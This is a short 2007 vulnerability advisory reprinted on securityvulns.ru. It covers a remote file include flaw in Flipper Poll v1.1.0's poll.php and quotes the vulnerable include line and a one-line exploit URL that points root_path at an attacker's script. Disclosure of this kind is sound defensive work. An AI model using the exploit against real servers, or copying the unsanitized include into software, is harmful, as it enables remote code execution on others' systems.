Computer Security

Security Advisory: Flipper Poll v1.1.0 (poll.php) remote file include vuln
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  EQdkp <= 1.3.1 Referer Spoof to access to SQL Database

  CoD2: DreamStats <= 4.2 (index.php) Remote File Include Vulnerability

  Photo Galerie Standard <= 1.1 (view.php) Remote SQL Injection Vulnerability

  dB Masters' Curium CMS <= 1.03(c_id) Remote Blind SQL Injection Vulnerability

From:cw.cybersecurity_(at)_gmail.com <cw.cybersecurity_(at)_gmail.com>
Date:03.02.2007
Subject:Flipper Poll v1.1.0 (poll.php) remote file include vuln

Flipper Poll v1.1.0 (poll.php) remote file include vuln
---------------------------------------------------------------------------------


Found: Cyber-Security
cyber-security.org

---------------------------------------------------------------------------------


Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828

---------------------------------------------------------------------------------


Vuln Code: include_once($root_path . 'config.php');

---------------------------------------------------------------------------------


Exploit: /poll.php?root_path=evilscripts?

---------------------------------------------------------------------------------


Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596

---------------------------------------------------------------------------------
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server